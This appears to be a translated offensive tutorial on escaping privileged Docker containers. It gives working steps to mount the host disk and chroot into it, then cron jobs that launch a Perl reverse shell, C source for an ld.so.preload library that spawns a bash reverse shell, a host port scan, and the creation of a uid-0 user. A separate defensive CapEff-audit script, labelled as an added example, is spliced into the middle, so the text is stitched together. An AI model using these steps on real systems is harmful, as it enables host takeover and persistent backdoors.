Improper configuration of CAP (capability) permissions
--privileged: privileged container privilege escalation
Test environment configuration
docker run -it --privileged ubuntu:18.04
Actual environment use
If CapEff shows 0000003fffffffff, the container holds the full capability set, i.e. it is a privileged container, and escape is possible
cat /proc/1/status|grep CapEff
CapEff: 0000003fffffffff
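A defender-side version of this check, added here as an example (it is not part of the original post): it parses the CapEff line the way the command above shows it, counts the capabilities in the mask, and reports whether the set covers the full 38-capability value 0000003fffffffff quoted above. The sample status file is constructed; the 38-capability figure is an assumption matching the post's kernel, and newer kernels expose more bits, which the superset test handles.

```shell
#!/bin/sh
# Audit helper (added example, not from the original post): decide whether a
# container's effective capability set looks privileged, using only /proc.
# Assumption: a full set is 38 capabilities (CapEff 0000003fffffffff), as in
# the post; recent kernels have more bits (e.g. 41 -> 000001ffffffffff).

FULL_CAPEFF_38=0000003fffffffff

# Extract the CapEff hex value from a status file (defaults to PID 1's).
capeff_from_status() {
    status_file="${1:-/proc/1/status}"
    awk '/^CapEff:/ { print $2 }' "$status_file"
}

# Count set bits in a hex capability mask (each bit is one capability).
count_caps() {
    mask=$((0x$1))
    n=0
    while [ "$mask" -ne 0 ]; do
        n=$((n + (mask & 1)))
        mask=$((mask >> 1))
    done
    echo "$n"
}

# "privileged" when the mask contains the whole 38-cap set (a newer kernel
# with extra bits is a superset and still counts); otherwise "restricted".
classify_capeff() {
    full=$((0x$FULL_CAPEFF_38))
    mask=$((0x$1))
    if [ $((mask & full)) -eq "$full" ]; then
        echo privileged
    else
        echo restricted
    fi
}

# One-line verdict for a status file.
audit_container() {
    eff="$(capeff_from_status "$1")"
    echo "CapEff=$eff caps=$(count_caps "$eff") verdict=$(classify_capeff "$eff")"
}

# Constructed sample: status of PID 1 inside a default (non-privileged)
# Docker container, which keeps only 14 capabilities.
SAMPLE_STATUS="$(mktemp)"
printf 'Name:\tbash\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n' > "$SAMPLE_STATUS"
audit_container "$SAMPLE_STATUS"
rm -f "$SAMPLE_STATUS"
```

Run it with no argument inside a container (audit_container /proc/1/status) to get the verdict for the container you are in.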
Escape method: mount the host root directory
fdisk -l|grep Linux
mkdir /host
# /dev/vda1 is the host's root partition found with fdisk above; it differs per machine
mount /dev/vda1 /host
chroot /host
At this point the escape is only at the file-system level; it is not a complete escape yet, so one of the following methods is still needed
Scheduled Tasks
/var/spool/cron/crontabs/ for Ubuntu and Debian
ls -la /var/spool/cron/crontabs
If the directory exists, it means we can write a crontab
echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/crontabs/root
chmod 600 /var/spool/cron/crontabs/root
Then just wait for cron to run the job
/var/spool/cron for CentOS
ls -la /var/spool/cron/
If the directory exists, it means we can write a crontab
echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/root
chmod 600 /var/spool/cron/root
ld.so.preload
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int tcp_port = 8080;
char *ip = "127.0.0.1";

/* Destructor: runs when any process that preloaded this library exits. */
__attribute__((destructor)) void test(){
    /* Remove the preload entry so the library is only injected once. */
    remove("/etc/ld.so.preload");
    int pid;
    if((pid=fork())==0){
        /* Child: connect to ip:tcp_port and attach a shell to that socket. */
        int fd;
        struct sockaddr_in addr;
        addr.sin_family = AF_INET;
        addr.sin_port = htons(tcp_port);
        addr.sin_addr.s_addr = inet_addr(ip);
        fd = socket(AF_INET, SOCK_STREAM, 0);
        connect(fd, (struct sockaddr*)&addr, sizeof(addr));
        dup2(fd, 0);
        dup2(fd, 1);
        dup2(fd, 2);
        system("/bin/bash");
    }
}
gcc evil.c --shared -fPIC -o evil.so
Upload evil.so to /tmp
echo '/tmp/evil.so' >/etc/ld.so.preload
From then on the host's dynamic loader pulls this .so into every new dynamically linked process, so the injection is not noticeable and completes the escape. It still only fires when something on the host starts a new process, for example routine operations and maintenance activity
ssh
Once the file-system-level escape to the host is done, the host can be port scanned
nc -nvz -w2 172.17.0.1 1-65535 2>&1|grep succeeded
If the host turns out to have an SSH service open, we can log in to the host over SSH directly to escape
Directly add a user with adduser
adduser test
passwd test
Alternatively, edit /etc/passwd and change the uid of test to 0 so that the user becomes root